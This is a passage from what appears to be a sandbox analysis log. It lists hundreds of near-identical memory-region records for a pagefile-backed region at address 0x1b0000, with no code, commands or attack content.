0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9582 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9583 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9584 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9585 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9586 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9587 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9588 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9589 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9590 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9591 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9592 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9593 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9594 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9595 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9596 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9597 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9598 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9599 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9600 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9601 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9602 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9603 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9604 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9605 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9606 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9607 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9608 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9609 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9610 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9611 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9612 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9613 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9614 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9615 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9616 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9617 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9618 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9619 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9669 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9670 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9672 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9673 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9674 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9675 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9676 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9677 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9678 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9679 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9680 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9681 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9682 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9683 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9684 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9685 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9686 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9688 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9689 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9690 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9691 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9692 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9693 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9694 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9695 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9696 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9697 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9698 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9699 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9700 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9701 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9702 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9703 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9704 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9705 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9706 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9707 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9708 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9709 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9710 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9711 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9712 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9713 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9768 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9769 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9770 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9771 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9772 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9773 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9774 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9775 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9776 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9777 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9778 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9779 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9780 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9781 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9782 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9783 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9784 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9785 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9786 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9787 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9788 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9789 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9790 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9791 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9792 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9793 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9794 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9795 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9796 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9797 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9798 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9799 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9800 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9801 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9802 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9803 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9804 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9805 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9806 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9807 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9808 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9809 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9810 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9882 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9883 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9884 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9906 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9907 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9908 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9969 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9970 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9971 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9972 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 